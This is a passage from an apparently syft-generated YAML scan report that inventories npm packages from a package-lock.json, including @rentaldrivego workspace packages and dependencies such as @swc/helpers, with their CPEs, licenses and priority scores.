name: '@rentaldrivego/dashboard'
|
|
version: UNKNOWN
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/dashboard:\@rentaldrivego\/dashboard:*:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/dashboard
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: apps/dashboard
|
|
integrity: ''
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 71d8c650760061fb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/database 1.0.0'
|
|
title: '@rentaldrivego/database 1.0.0'
|
|
description: 'Package discovered: @rentaldrivego/database 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bd8906fc40f841ac
|
|
name: '@rentaldrivego/database'
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/database:\@rentaldrivego\/database:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/database@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: ''
|
|
integrity: ''
|
|
dependencies:
|
|
'@prisma/client': ^5.13.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8b90575e8ea88bd4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/database UNKNOWN'
|
|
title: '@rentaldrivego/database UNKNOWN'
|
|
description: 'Package discovered: @rentaldrivego/database UNKNOWN'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2bdca263d566c09a
|
|
name: '@rentaldrivego/database'
|
|
version: UNKNOWN
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/database:\@rentaldrivego\/database:*:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/database
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: packages/database
|
|
integrity: ''
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8a8bb5bfb12506b1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/marketplace 1.0.0'
|
|
title: '@rentaldrivego/marketplace 1.0.0'
|
|
description: 'Package discovered: @rentaldrivego/marketplace 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 71e9d3c366707710
|
|
name: '@rentaldrivego/marketplace'
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/marketplace:\@rentaldrivego\/marketplace:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/marketplace@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: ''
|
|
integrity: ''
|
|
dependencies:
|
|
'@rentaldrivego/types': '*'
|
|
autoprefixer: ^10.4.19
|
|
dayjs: ^1.11.11
|
|
lucide-react: ^0.376.0
|
|
next: 14.2.3
|
|
postcss: ^8.4.38
|
|
react: ^18.3.1
|
|
react-dom: ^18.3.1
|
|
tailwindcss: ^3.4.3
|
|
zod: ^3.23.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f48ad70ae4557b5a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/marketplace UNKNOWN'
|
|
title: '@rentaldrivego/marketplace UNKNOWN'
|
|
description: 'Package discovered: @rentaldrivego/marketplace UNKNOWN'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 999e66650845f9f4
|
|
name: '@rentaldrivego/marketplace'
|
|
version: UNKNOWN
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/marketplace:\@rentaldrivego\/marketplace:*:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/marketplace
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: apps/marketplace
|
|
integrity: ''
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 93a5bccb6ac6aa22
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/public-site 1.0.0'
|
|
title: '@rentaldrivego/public-site 1.0.0'
|
|
description: 'Package discovered: @rentaldrivego/public-site 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f54f88caa8e97b5c
|
|
name: '@rentaldrivego/public-site'
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/public-site:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/public-site:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/public_site:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/public_site:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/public:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/public:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/public-site@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: ''
|
|
integrity: ''
|
|
dependencies:
|
|
'@rentaldrivego/types': '*'
|
|
autoprefixer: ^10.4.19
|
|
dayjs: ^1.11.11
|
|
lucide-react: ^0.376.0
|
|
next: 14.2.3
|
|
postcss: ^8.4.38
|
|
react: ^18.3.1
|
|
react-dom: ^18.3.1
|
|
tailwindcss: ^3.4.3
|
|
zod: ^3.23.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 308a85ace6addbbf
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/types 1.0.0'
|
|
title: '@rentaldrivego/types 1.0.0'
|
|
description: 'Package discovered: @rentaldrivego/types 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ba9eab15fb9d9b6f
|
|
name: '@rentaldrivego/types'
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/types:\@rentaldrivego\/types:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/types@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: ''
|
|
integrity: ''
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7f447d2356272ad6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/types UNKNOWN'
|
|
title: '@rentaldrivego/types UNKNOWN'
|
|
description: 'Package discovered: @rentaldrivego/types UNKNOWN'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f26df386702211f3
|
|
name: '@rentaldrivego/types'
|
|
version: UNKNOWN
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/types:\@rentaldrivego\/types:*:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/types
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: packages/types
|
|
integrity: ''
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4b6c5d98db4a925c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @selderee/plugin-htmlparser2 0.11.0'
|
|
title: '@selderee/plugin-htmlparser2 0.11.0'
|
|
description: 'Package discovered: @selderee/plugin-htmlparser2 0.11.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 264d7bf353437253
|
|
name: '@selderee/plugin-htmlparser2'
|
|
version: 0.11.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@selderee\/plugin-htmlparser2:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@selderee\/plugin-htmlparser2:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@selderee\/plugin_htmlparser2:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@selderee\/plugin_htmlparser2:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@selderee\/plugin:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@selderee\/plugin:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40selderee/plugin-htmlparser2@0.11.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@selderee/plugin-htmlparser2/-/plugin-htmlparser2-0.11.0.tgz
|
|
integrity: sha512-P33hHGdldxGabLFjPPpaTxVolMrzrcegejx+0GxjrIb9Zv48D8yAIA/QTDR2dFl7Uz7urX8aX6+5bCZslr+gWQ==
|
|
dependencies:
|
|
domhandler: ^5.0.3
|
|
selderee: ^0.11.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 96b2d8a0d3d3dca0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @socket.io/component-emitter 3.1.2'
|
|
title: '@socket.io/component-emitter 3.1.2'
|
|
description: 'Package discovered: @socket.io/component-emitter 3.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 32ce324a035d4e3a
|
|
name: '@socket.io/component-emitter'
|
|
version: 3.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@socket.io\/component-emitter:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@socket.io\/component-emitter:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@socket.io\/component_emitter:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@socket.io\/component_emitter:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@socket.io\/component:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@socket.io\/component:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40socket.io/component-emitter@3.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@socket.io/component-emitter/-/component-emitter-3.1.2.tgz
|
|
integrity: sha512-9BCxFwvbGg/RsZK9tjXd8s4UcwR0MWeFQ1XEKIQVVvAGJyINdrqKMcTRyLoK8Rse1GjzLV9cwjWV1olXRWEXVA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: de2edab9a58d26f1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @swc/counter 0.1.3'
|
|
title: '@swc/counter 0.1.3'
|
|
description: 'Package discovered: @swc/counter 0.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d1ab0047814562a3
|
|
name: '@swc/counter'
|
|
version: 0.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@swc\/counter:\@swc\/counter:0.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40swc/counter@0.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@swc/counter/-/counter-0.1.3.tgz
|
|
integrity: sha512-e2BR4lsJkkRlKZ/qCHPw9ZaSxc0MVUd7gtbtaB7aMvHeJVYe8sOB8DBZkP2DtISHGSku9sCK6T6cnY0CtXrOCQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6291224f1bf77e3f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @swc/helpers 0.5.21'
|
|
title: '@swc/helpers 0.5.21'
|
|
description: 'Package discovered: @swc/helpers 0.5.21'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f2d04f064acf1b61
|
|
name: '@swc/helpers'
|
|
version: 0.5.21
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@swc\/helpers:\@swc\/helpers:0.5.21:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40swc/helpers@0.5.21
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.21.tgz
|
|
integrity: sha512-jI/VAmtdjB/RnI8GTnokyX7Ug8c+g+ffD6QRLa6XQewtnGyukKkKSk3wLTM3b5cjt1jNh9x0jfVlagdN2gDKQg==
|
|
dependencies:
|
|
tslib: ^2.8.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ec0bf772439a91e3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @swc/helpers 0.5.5'
|
|
title: '@swc/helpers 0.5.5'
|
|
description: 'Package discovered: @swc/helpers 0.5.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 72bc47189d44cca0
|
|
name: '@swc/helpers'
|
|
version: 0.5.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@swc\/helpers:\@swc\/helpers:0.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40swc/helpers@0.5.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.5.tgz
|
|
integrity: sha512-KGYxvIOXcceOAbEk4bi/dVLEK9z8sZ0uBB3Il5b1rhfClSpcX0yfRO0KmTkqR2cnQDymwLB+25ZyMzICg/cm/A==
|
|
dependencies:
|
|
'@swc/counter': ^0.1.3
|
|
tslib: ^2.4.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 19698700a5d5ff08
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @tootallnate/once 2.0.0'
|
|
title: '@tootallnate/once 2.0.0'
|
|
description: 'Package discovered: @tootallnate/once 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a7bdaefe075a54be
|
|
name: '@tootallnate/once'
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@tootallnate\/once:\@tootallnate\/once:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40tootallnate/once@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz
|
|
integrity: sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 80bf92167036230d
|
|
